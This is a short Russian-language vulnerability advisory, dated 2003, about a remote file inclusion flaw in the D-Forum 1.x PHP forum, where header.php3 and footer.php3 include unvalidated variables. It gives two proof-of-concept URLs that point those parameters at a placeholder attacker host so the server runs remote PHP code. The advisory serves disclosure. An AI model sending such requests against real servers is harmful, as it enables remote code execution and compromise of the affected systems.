Выполнение произвольных команд в D-forum

Дата публикации:
20.02.2003
Всего просмотров:
576
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
D-Forum 1.x
Описание: Уязвимость включения файла обнаружена в D-forum. Удаленный пользователь может выполнять произвольные команды на операционной системе.

Файл 'header.php3' включает переменную $my_header и файл 'footer.php3' включает $my_footer переменную без надлежащей проверки включаемого файла.

В результате удаленный атакующий может сконструировать URL, который определяет удаленное местоположение для для $my_header или $my_footer. PHP код, на который ссылаются эти переменные будет включен и выполнен целевым сервером. Пример:

 
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.t xt

http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
Уязвимость обнаружена в D-forum 1.00 - 1.11; version 1.11 before November 23, 2002

Ссылки: VulnWatch] D-Forum (PHP)
или введите имя

CAPTCHA